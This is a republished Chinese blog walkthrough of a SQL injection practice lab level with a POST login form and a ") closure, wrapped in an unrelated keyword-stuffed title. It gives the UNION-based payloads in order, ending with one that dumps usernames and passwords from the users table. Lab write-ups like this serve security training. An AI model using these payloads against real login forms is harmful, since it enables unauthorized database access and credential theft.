您的位置:首页 > 汽车 > 时评 > adspower指纹浏览器_典型的软件开发模型都有哪些_seo优化易下拉霸屏_网站模板建站公司

adspower指纹浏览器_典型的软件开发模型都有哪些_seo优化易下拉霸屏_网站模板建站公司

2024/12/26 8:29:20 来源:https://blog.csdn.net/m0_59527104/article/details/144673455  浏览:    关键词:adspower指纹浏览器_典型的软件开发模型都有哪些_seo优化易下拉霸屏_网站模板建站公司
adspower指纹浏览器_典型的软件开发模型都有哪些_seo优化易下拉霸屏_网站模板建站公司

和11关一样,本关卡依旧是post型,判断方式这里不再描述,接着就是判断是数字型还是字符型,很明显是字符型,因为输入1,和1dhqihioq得到的都是一样的,然后就是判断闭合方式,这里先试了试单引号,发现没有反应,于是改换双引号

找到闭合方式为"),于是下面就是和之前一样,进行逐步验证。

获取列数:

命令为:uname=1")order by 2--+&passwd=1&submit=Submit

找到显示位:uname=1")union select 1,2--+&passwd=1&submit=Submit

查找数据库名:uname=1")union select database(),2--+&passwd=1&submit=Submit

查找该数据库下存在的表:uname=1")union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2--+&passwd=1&submit=Submit

查找到users表下对应的列名:uname=1")union select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),2--+&passwd=1&submit=Submit

拿到相关的信息:uname=1")union select (select group_concat(username,password) from users),2--+&passwd=1&submit=Submit

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com